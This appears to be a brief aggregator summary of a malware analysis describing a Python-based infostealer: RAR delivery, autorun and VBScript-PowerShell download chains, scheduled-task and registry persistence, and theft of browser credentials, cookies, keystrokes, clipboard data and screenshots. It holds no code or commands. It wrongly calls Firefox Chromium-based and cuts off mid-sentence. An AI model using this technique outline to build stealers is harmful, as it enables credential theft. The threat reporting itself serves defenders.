The analysis provided details a sophisticated malware campaign that leverages Python-based implants to steal sensitive data from compromised systems. Here's a summary of the key points:
-
Distribution Method: The malware is distributed via compressed RAR files containing malicious Python scripts and executables.
-
Execution Mechanism:
- The payload includes an autorun.inf file to automatically execute when the archive is opened.
- A VBScript (vbs) file runs a PowerShell command to download and execute a Python script from a remote server.
- The downloaded Python script then executes further malicious activities.
-
Persistence Mechanism:
- The malware creates scheduled tasks to ensure persistent execution of its components.
- It also sets up registry keys for persistence.
-
Data Collection Capabilities:
- Browser Credentials and Cookies: Collects stored passwords and session cookies from major Chromium-based browsers (Chrome, Edge, Firefox) using AES-GCM master key decryption techniques.
- Keylogging: Captures keystrokes continuously and uploads them periodically to the C2 server.
- Clipboard Monitoring: Monitors clipboard contents in real-time for sensitive information.
- Screenshot Capture: Uses the mss library to capture desktop
Read the full article at Malware Analysis, News and Indicators - Latest topics
Want to create content about this topic? Use Nemati AI tools to generate articles, social posts, and more.
4
Ali NematiWritten by Ali
![[AINews] The Unreasonable Effectiveness of Closing the Loop](/_next/image?url=https%3A%2F%2Fmedia.nemati.ai%2Fmedia%2Fblog%2Fimages%2Farticles%2F600e22851bc7453b.webp&w=3840&q=75)
